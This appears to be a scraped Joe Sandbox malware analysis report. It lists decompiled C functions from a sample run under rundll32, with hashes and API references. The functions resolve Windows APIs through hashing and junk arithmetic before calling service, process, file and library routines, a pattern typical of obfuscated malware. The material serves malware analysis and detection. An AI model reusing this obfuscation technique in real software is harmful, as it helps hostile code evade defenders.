Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00225FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00225FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00225fb5
0x00225fb6
0x00225fb7
0x00225fbb
0x00225fbc
0x00225fc1
0x00225fcb
0x00225fd7
0x00225fde
0x00225fe5
0x00225ffc
0x00225fff
0x00226006
0x0022600d
0x0022601a
0x00226025
0x0022602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025

Memory Dump Source

Source File: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2111618027.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2111676302.000000000023C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_220000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2472 Parent PID: 2444 rundll32.exeCOMMON

Executed Functions

Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC

Strings

<^, xrefs: 00212977

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0021c6e1
0x0021c6e6
0x0021c6f0
0x0021c6fc
0x0021c703
0x0021c706
0x0021c70d
0x0021c711
0x0021c715
0x0021c71c
0x0021c723
0x0021c72a
0x0021c731
0x0021c738
0x0021c751
0x0021c762
0x0021c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762

Strings

/O, xrefs: 0021C6E6

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096

Strings

[, xrefs: 0021103B

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0021485e
0x0021487a
0x0021487d
0x00214884
0x0021488b
0x00214892
0x0021489d
0x002148a0
0x002148ad
0x002148b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002148B7

Strings

[, xrefs: 0021488B

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00224f80
0x00224f81
0x00224f82
0x00224f86
0x00224f87
0x00224f8c
0x00224fa5
0x00224fa8
0x00224faf
0x00224fb6
0x00224fc7
0x00224fca
0x00224fd7
0x00224fe2
0x00224fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2

Strings

{#lm, xrefs: 00224FC2

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

APIs

CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0021b6f3
0x0021b6f8
0x0021b702
0x0021b70b
0x0021b712
0x0021b719
0x0021b720
0x0021b727
0x0021b72e
0x0021b747
0x0021b759
0x0021b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0022aa3f
0x0022aa40
0x0022aa41
0x0022aa44
0x0022aa47
0x0022aa4b
0x0022aa4c
0x0022aa51
0x0022aa5b
0x0022aa64
0x0022aa68
0x0022aa6f
0x0022aa76
0x0022aa8d
0x0022aa90
0x0022aa9d
0x0022aaa8
0x0022aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
